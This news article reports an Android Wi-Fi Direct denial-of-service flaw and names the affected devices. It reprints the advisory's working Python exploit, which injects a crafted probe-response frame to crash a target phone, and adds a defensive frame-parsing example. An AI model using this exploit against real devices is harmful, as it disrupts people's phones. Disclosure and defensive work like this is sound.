Some Android Devices Vulnerable to DoS from WiFi Direct Vulnerability


Android devices are vulnerable to a denial of service (DoS) through a WiFi Direct vulnerability discovered by Andres Blanco of CoreLabs.

An attacker could send a specially crafted 802.11 Probe Response frame that causes the Dalvik subsystem to reboot because of an unhandled exception in the WiFiMonitor class.

Vulnerable devices include:

- Nexus 5 – Android 4.4.4
- Nexus 4 – Android 4.4.4
- LG D806 – Android 4.2.2
- Samsung SM-T310 – Android 4.2.2
- Motorola RAZR HD – Android 4.1.2

Core Security disclosed the vulnerability on Seclists. The bug is in Android's modified wpa_supplicant, which provides the interface between the wireless driver and the Android platform.

When the attacker's frame carries a malformed device name, the modified wpa_supplicant emits a malformed event string, and Android's WifiP2pDevice class throws an IllegalArgumentException, crashing the device: "a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException".

Here is the PoC from the Seclists post:

This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
#!/usr/bin/env python
# Python 2 PoC from the advisory: builds a single 802.11 Probe Response
# carrying a Wi-Fi Direct (P2P) vendor IE and injects it with PyLorcon2.
import sys
import time
import struct
import PyLorcon2


def get_probe_response(source, destination, channel):
    frame = str()
    frame += "\x50\x00"  # Frame Control
    frame += "\x00\x00"  # Duration
    frame += destination
    frame += source
    frame += source
    frame += "\x00\x00"  # Sequence Control
    frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
    frame += "\x64\x00"  # Beacon Interval
    frame += "\x30\x04"  # Capabilities Information
    # SSID IE
    frame += "\x00"
    frame += "\x07"
    frame += "DIRECT-"
    # Supported Rates
    frame += "\x01"
    frame += "\x08"
    frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    # DS Parameter Set
    frame += "\x03"
    frame += "\x01"
    frame += struct.pack("B", channel)
    # P2P vendor-specific IE (WFA OUI 50:6F:9A, OUI type 0x09)
    frame += "\xDD"
    frame += "\x27"
    frame += "\x50\x6F\x9A"
    frame += "\x09"
    # P2P Capabilities
    frame += "\x02"  # ID
    frame += "\x02\x00"  # Length
    frame += "\x21\x00"
    # P2P Device Info
    frame += "\x0D"  # ID
    frame += "\x1B\x00"  # Length
    frame += source
    frame += "\x01\x88"
    frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
    frame += "\x00"
    frame += "\x10\x11"  # Device Name attribute (WPS TLV)
    frame += "\x00\x06"  # Device Name length
    frame += "fafa\xFA\xFA"  # the device name bytes that produce the malformed event string
    return frame


def str_to_mac(address):
    return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:"
        print "  poc.py <iface> <destination>"
        print "Example:"
        print "  poc.py wlan0 00:11:22:33:44:55"
        sys.exit(-1)
    iface = sys.argv[1]
    destination = str_to_mac(sys.argv[2])
    context = PyLorcon2.Context(iface)
    context.open_injmon()
    channel = 1
    source = str_to_mac("00:11:22:33:44:55")
    frame = get_probe_response(source, destination, channel)
    print "Injecting PoC."
    for i in range(100):
        context.send_bytes(frame)
        time.sleep(0.100)
-----/
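As an added example, written for this page and not taken from the advisory or the article: a defensive parser in Python 3 that walks a probe-response frame, locates the Wi-Fi Direct vendor IE and its P2P Device Info attribute, and returns a verdict on the Device Name instead of raising on bad input. This is the check a frame-level monitor or a hardened event-string producer would apply before handing a name to a parser like WifiP2pDevice. The helper names (`check_probe_response`, `make_test_frame`) and constants are this example's own; the frame layout follows the PoC above, and `make_test_frame` only builds in-memory fixtures. The page does not say which bytes break the event-string parser, so the acceptance rule is a conservative assumption: a name must be non-empty, valid UTF-8 and printable.

```python
"""Added example (not from the advisory or the article): defensive parsing of
the P2P Device Name in an 802.11 probe response, returning a verdict rather
than raising on malformed input."""
import struct

WFA_P2P_OUI = b"\x50\x6f\x9a"       # Wi-Fi Alliance OUI carried by the P2P vendor IE
P2P_OUI_TYPE = 0x09                 # OUI type for P2P
P2P_ATTR_DEVICE_INFO = 0x0D
WPS_ATTR_DEVICE_NAME = 0x1011
MGMT_HDR_LEN = 24                   # FC, duration, addr1-3, sequence control
PROBE_RESP_FIXED_LEN = 12           # timestamp(8) + beacon interval(2) + capabilities(2)

def iter_ies(body):
    """Yield (id, payload) for each 802.11 information element in body."""
    off = 0
    while off + 2 <= len(body):
        ie_id, ie_len = body[off], body[off + 1]
        payload = body[off + 2:off + 2 + ie_len]
        if len(payload) != ie_len:
            raise ValueError("truncated IE id=%d" % ie_id)
        yield ie_id, payload
        off += 2 + ie_len

def iter_p2p_attrs(p2p_payload):
    """Yield (attr_id, data) for P2P attributes: 1-byte id, 2-byte LE length."""
    off = 0
    while off + 3 <= len(p2p_payload):
        attr_id = p2p_payload[off]
        attr_len = struct.unpack_from("<H", p2p_payload, off + 1)[0]
        data = p2p_payload[off + 3:off + 3 + attr_len]
        if len(data) != attr_len:
            raise ValueError("truncated P2P attribute id=%d" % attr_id)
        yield attr_id, data
        off += 3 + attr_len

def parse_device_info(data):
    """Parse a P2P Device Info attribute into a dict; the device name stays raw bytes."""
    # device address (6) | config methods (2) | primary device type (8) | n_secondary (1)
    if len(data) < 17:
        raise ValueError("Device Info attribute too short")
    dev_addr = ":".join("%02x" % b for b in data[:6])
    config_methods = struct.unpack_from(">H", data, 6)[0]
    off = 17 + 8 * data[16]          # skip secondary device types, 8 bytes each
    # Device Name is a WPS TLV: 2-byte BE type, 2-byte BE length, value
    if off + 4 > len(data):
        raise ValueError("Device Info attribute has no Device Name TLV")
    tlv_type, tlv_len = struct.unpack_from(">HH", data, off)
    if tlv_type != WPS_ATTR_DEVICE_NAME:
        raise ValueError("expected Device Name TLV, got 0x%04x" % tlv_type)
    name = data[off + 4:off + 4 + tlv_len]
    if len(name) != tlv_len:
        raise ValueError("Device Name length exceeds attribute")
    return {"dev_addr": dev_addr, "config_methods": config_methods, "name": name}

def check_probe_response(frame):
    """Classify a raw probe-response frame:
    ("ok", name)          printable UTF-8 device name
    ("malformed", reason) bad structure, or a name that must not be passed on
    ("no-p2p", None)      no P2P Device Info present"""
    if len(frame) < MGMT_HDR_LEN + PROBE_RESP_FIXED_LEN:
        return ("malformed", "frame shorter than a probe-response header")
    body = frame[MGMT_HDR_LEN + PROBE_RESP_FIXED_LEN:]
    try:
        for ie_id, payload in iter_ies(body):
            if ie_id != 0xDD or not payload.startswith(WFA_P2P_OUI + bytes([P2P_OUI_TYPE])):
                continue
            for attr_id, data in iter_p2p_attrs(payload[4:]):
                if attr_id != P2P_ATTR_DEVICE_INFO:
                    continue
                raw = parse_device_info(data)["name"]
                try:
                    name = raw.decode("utf-8")
                except UnicodeDecodeError:
                    return ("malformed", "device name is not valid UTF-8: %r" % raw)
                if not name or not name.isprintable():
                    return ("malformed", "device name empty or non-printable: %r" % name)
                return ("ok", name)
    except ValueError as exc:
        return ("malformed", str(exc))
    return ("no-p2p", None)

def make_test_frame(device_name, channel=1):
    """Constructed in-memory fixture for the parser (not for transmission): a
    minimal probe response with SSID DIRECT-, a DS Parameter Set and a P2P IE."""
    src, dst = b"\x00\x11\x22\x33\x44\x55", b"\xff" * 6
    dev_info = src + b"\x01\x88" + b"\x00\x0a\x00\x50\xf2\x04\x00\x05" + b"\x00"
    dev_info += struct.pack(">HH", WPS_ATTR_DEVICE_NAME, len(device_name)) + device_name
    p2p = WFA_P2P_OUI + bytes([P2P_OUI_TYPE])
    p2p += b"\x02" + struct.pack("<H", 2) + b"\x21\x00"                # P2P Capability
    p2p += bytes([P2P_ATTR_DEVICE_INFO]) + struct.pack("<H", len(dev_info)) + dev_info
    body = b"\x00\x07DIRECT-" + b"\x03\x01" + bytes([channel])
    body += b"\xdd" + bytes([len(p2p)]) + p2p
    header = b"\x50\x00\x00\x00" + dst + src + src + b"\x00\x00"
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x30\x04"
    return header + fixed + body

if __name__ == "__main__":
    for sample in (b"MyPhone", b"fafa\xfa\xfa", b"Bad\x00Name"):
        print(sample, "->", check_probe_response(make_test_frame(sample)))
```

Every length field is checked against the bytes actually present, so a truncated IE or a Device Name whose declared length overruns its attribute comes back as a `malformed` verdict; the same holds for a name that is not valid UTF-8 or contains non-printable characters. That is the property the Android code path lacked: the event string was built and parsed on the assumption that the name was well-formed, and the resulting exception went uncaught.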
Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]